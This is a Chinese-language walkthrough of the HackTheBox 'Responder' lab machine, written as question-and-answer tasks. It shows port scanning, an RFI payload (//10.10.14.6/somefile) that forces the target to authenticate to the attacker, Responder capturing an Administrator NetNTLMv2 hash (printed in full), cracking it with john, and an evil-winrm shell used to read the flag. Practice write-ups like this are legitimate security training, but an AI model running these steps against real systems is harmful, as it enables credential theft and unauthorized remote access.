首页 靶场练习 HackTheBox Staring Point

# 相关资料

  • getshell
  • responser 捕获 win hash
  • evil-winrm

# Task 1

Q:How many TCP ports are open on the machine?

┌──(root💀kali)-[~]
└─# nmap -sC -Pn -p1-65535 10.129.42.95
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-05 16:12 CST
Nmap scan report for 10.129.42.95
Host is up (0.39s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  wsman
7680/tcp open  pando-pub
Nmap done: 1 IP address (1 host up) scanned in 790.35 seconds
很多命令都可以扫描端口号,不一定非要这一个,如果去掉其他的相关扫描能够节省更多时间

A:3
# Task 2
Q:When visiting the web service using the IP address, what is the domain that we are being redirected to?

直接打开访问,看重定向到哪里了

A:unika.htb
# Task 3
Q:Which scripting language is being used on the server to generate webpages?

抓包,然后查看 response,返回了版本信息

也可以通过在 hosts 文件中添加解析信息,这样就不会重定向后找不到 IP 地址

A:php
# Task 4
Q:What is the name of the URL parameter which is used to load different language versions of the webpage?

随便点一个,要提交的参数

A:page
# Task 5
Q:Which of the following values for the page parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

问哪个是本地文件包含

A: ../../../../../../../../windows/system32/drivers/etc/hosts
# Task 6
Q:Which of the following values for the page parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"

问哪个是远程包含

A: //10.10.14.6/somefile
# Task 7
Q:What does NTLM stand for?
NTLM 是 Microsoft 创建的认证协议的集合。它是一种质询 - 响应身份验证协议,用于将客户端认证为 Active Directory 域中的资源

A:New Technology LAN Manager
# Task 8
Q:Which flag do we use in the Responder utility to specify the network interface?

Responder 工具

A: -I
# Task 9
Q:There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john , but the full name is what?.

用来破解 hash 的,这个得尝试用一用 responser 康康

A:john the ripper
# Task 10
Q:What is the password for the administrator user?

先启动 responser 监听本地 tun0 网卡
┌──(root💀kali)-[~]
└─# responder -I tun0                                                    1
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
           NBT-NS, LLMNR & MDNS Responder 3.0.7.0
  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]
    DHCP                       [OFF]
[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]
[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]
    Fingerprint hosts          [OFF]
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.86]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']
[+] Current Session Variables:
    Responder Machine Name     [WIN-BEA716J9KXD]
    Responder Domain Name      [HALN.LOCAL]
    Responder DCE-RPC Port     [47831]
[+] Listening for events...
访问 ```unika.htb/?page=//10.10.14.6/somefile

让他远程包含本地文件,这样他会回访我们,就会被拦截到hash

```cpp
[+] Listening for events...                                                  

          [ON]

[SMB] NTLMv2-SSP Client   : 10.129.42.95
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:c0c8045502c4f5c9:3BC1DBA1408AC8C9983028A14C1D4BAD:010100000000000080A1D5FFB460D8019D88C898C17C526F000000000200080032004F003100440001001E00570049004E002D005800570056003200510039003600370052004100340004003400570049004E002D00580057005600320051003900360037005200410034002E0032004F00310044002E004C004F00430041004C000300140032004F00310044002E004C004F00430041004C000500140032004F00310044002E004C004F00430041004C000700080080A1D5FFB460D80106000400020000000800300030000000000000000100000000200000C87CC66EFD81FD5B28F598D5ABF20A35198A4161CBD14CF93DB63F66F81482FB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00380036000000000000000000                                       
[*] Skipping previously captured hash for RESPONDER\Administrator

然后新建一个文件,把第 7 行的 hash 存进去,用 john 破解,时间比较长
┌──(root💀kali)-[~/桌面]
└─# john 1
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
Proceeding with incremental:ASCII

奶奶的跑了两个小时还没跑出来

A:badminton
# Task 11
Q:We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?

利用的是 5985 端口上的 wsman 远程处理

A:5985
# Flag
安装 evil-winrm
工具
┌──(root💀kali)-[~]
└─# gem install evil-winrm
使用破解的密码连上去
┌──(root💀kali)-[~]
└─# evil-winrm -i 10.129.42.95 -u Administrator -p badminton
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine                   
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion                                     
Info: Establishing connection to remote endpoint
查看 flag
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../../mike
*Evil-WinRM* PS C:\Users\mike> dir
    Directory: C:\Users\mike
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2022   4:51 AM                Desktop
*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir
    Directory: C:\Users\mike\Desktop
Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt
*Evil-WinRM* PS C:\Users\mike\Desktop> cat flag.txt
ea81b7afddd03efaa0945333ed147fac
flag: ea81b7afddd03efaa0945333ed147fac